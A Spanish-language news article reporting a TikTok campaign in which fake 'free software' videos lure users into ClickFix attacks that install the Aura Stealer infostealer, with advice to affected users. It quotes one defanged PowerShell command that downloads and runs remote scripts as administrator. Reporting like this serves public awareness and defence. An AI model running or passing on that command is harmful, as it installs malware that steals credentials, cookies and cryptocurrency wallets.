Día a Día News
Una nueva campaña de ciberdelincuentes utiliza la plataforma TikTok para difundir vídeos que aparentan ser guías para acceder gratis a software de pago, como Windows o Adobe Photoshop, así como a servicios de suscripción como Netflix o Spotify, pero que en realidad esconden ataques ClickFix diseñados para robar información de los usuarios.
Los atacantes aprovechan la popularidad de TikTok, un espacio con usuarios de todas las edades que buscan entretenimiento o información, para aplicar técnicas de ingeniería social. Los vídeos engañosos prometen desbloquear funciones o servicios de manera gratuita, mientras inducen a los usuarios a ejecutar comandos maliciosos que infectan sus dispositivos.
Xavier Mertens, responsable del SANS Internet Storm Center (ISC), ha señalado que los ataques ClickFix se basan en mostrar supuestas soluciones a problemas técnicos mediante ventanas emergentes. Al seguir los pasos indicados, las víctimas terminan ejecutando scripts maliciosos, generalmente a través de PowerShell, que permiten instalar ‘malware’ en sus equipos.
En la campaña detectada, cada vídeo incluye un comando de una sola línea, por ejemplo iex (irm slmgr[.]win/photoshop), que los usuarios deben ejecutar como administradores. En realidad, este código descarga y ejecuta otros scripts desde un servidor remoto, incluyendo Aura Stealer, un software diseñado para robar credenciales de acceso, cookies de autenticación y billeteras de criptomonedas.
Además, los expertos señalan que un segundo ejecutable se encarga de compilar código bajo demanda, aunque se desconoce su propósito final. Los especialistas recomiendan a quienes hayan seguido las instrucciones de estos vídeos restablecer todas sus contraseñas para evitar comprometer sus cuentas y dispositivos.
La alerta pone de manifiesto la creciente sofisticación de las campañas de ciberataques que se aprovechan de plataformas de uso masivo, subrayando la necesidad de precaución al ejecutar instrucciones provenientes de fuentes no verificadas.